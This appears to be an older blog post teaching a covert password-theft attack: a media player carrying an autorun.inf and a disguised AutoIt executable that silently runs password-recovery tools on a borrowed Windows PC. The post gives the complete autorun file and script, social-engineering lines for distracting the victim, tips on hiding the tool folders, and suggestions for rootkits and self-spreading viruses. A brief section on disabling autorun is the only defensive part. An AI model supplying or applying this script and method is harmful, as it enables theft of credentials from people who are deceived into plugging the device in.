In this attack, you take your -insert favorite media player here- to someone with a computer, and ask if you can quickly charge it for 5 minutes before you get back to work. You may sweeten the deal by offering to pass along a song, or share something with them they want. But once you walk away, you have all their passwords. Too good to be true? Not a chance! (Of course I'm targeting Windows in this, if you want to attack Macs or Linux, you just need to improvise a tad more).

Setup
To start with, you need to be able to access the hard drive on your media player. Using Rockbox is an easy way to do this. Once you have access to the media device, we're going to create a file in its root directory, autorun.inf. Something to the effect of:

[autorun]
shellexecute=ipod.exe
icon=ipod.ico

What the above does is declare that its the autorun file, set a custom icon for the ipod (have to make it look the part), and run a special exe we cook up. Save this file, and go grab AutoIt. I've just started using this program in the last 24 hours and man do I like it. Very simple to create exe files. What we're going to do is use this to execute a few password recovery toolkits. The specific ones aren't important, but I'm using ones by Nirsoft, MessenPass, Network Password Recovery, and Mailpass View currently for this demo. Create a folder in the root of your media player "\Hacks\Password\Software\take" and all of the parent folders. You'll want to drop all hacks into the Software folder, and the results of the scans will pop up in the take folder.

The icon I picked (since this is an iPod) was the following:

The exe we're going to create is made with the following Auto-It script which I won't go into detail on as its fairly straightforward, though the formatting is really bad in WordPress, I apologize. A nice version of the file is found here.

Run(@ComSpec & ' /c ".\Hacking\Password\Software\mspass.exe /stext .\Hacking\Password\Software\take\mspass.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\mailpv.exe /stext .\Hacking\Password\Software\take\mailpv.log"', @ScriptDir, @SW_HIDE)
sleep(200)
Run(@ComSpec & ' /c ".\Hacking\Password\Software\netpass.exe /stext .\Hacking\Password\Software\take\netpass.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Run(@ComSpec & ' /c "COPY .\Hacking\Password\Software\take\*.log .\Hacking\Password\Software\take\all.log"', @ScriptDir, @SW_HIDE)
sleep(3000)
Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC
Dim $Location = @WorkingDir & '.\Hacking\Password\Software\take\'
Dim $FileName = "all.log"
FileMove($Location & $FileName , $Location & $DateTime & ".txt",1)
sleep(3000)
Run(@ComSpec & ' /c "del .\Hacking\Password\Software\take\*.log"', @ScriptDir, @SW_HIDE)
sleep(1000)

Once you have that, build it and name the resulting file ipod.exe. Drop that into the root directory of the media device. We should be all set up now, to check double-click the ipod.exe and see if a text file pops up (it should take roughly 11 seconds to finish everything). If it does, continue on... if not go back up to creating the exe. Once all the files are in place, you probably want to set the files and folders for the hack to hidden. No reason why the mark should see "Hacking" as a root folder, eh?

Execution
Now that we have a working autorun.inf and ipod.exe its as simple as unplugging your media device, then plugging it back in. Thankfully on Windows XP only CDs are allowed to run autorun with no user intervention so we need to click on the media device, however on older versions this stick will run itself. This is where offers of music work wonders. If a business executive will give out a password for a chocolate bar, how many college students will let you open your iPod to give them free music? The first time you double click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?

Expanding the Hack
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:

[autorun]
shellexecute=http://www.stop-phishing.com
icon=ipod.ico

I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to.

On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses, anything that can be down by a windows executable and 60GB of space is possible here.

Defense
I was remiss last night in posting this without a defense section. The easiest way to prevent it from Autoplaying is to hold shift while inserting any media. This goes for CDs or USB sticks (again on XP you only have to worry about CDs or U3 cruzers). If that fails, a handy trick can be found here to disable autorun in Windows. To quote Thushan Fernando:

1. Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.
2. Goto 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'
3. When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.

This option turns off autorun.inf from ever running and I highly recommend it.

Research
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.

I hope to keep playing around with the iPod as a platform for hacking as it is so commonplace on a college campus. My ultimate goal probably being getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lay about.

And the best part of all this? You can perform the attack while listening to your favorite tunes!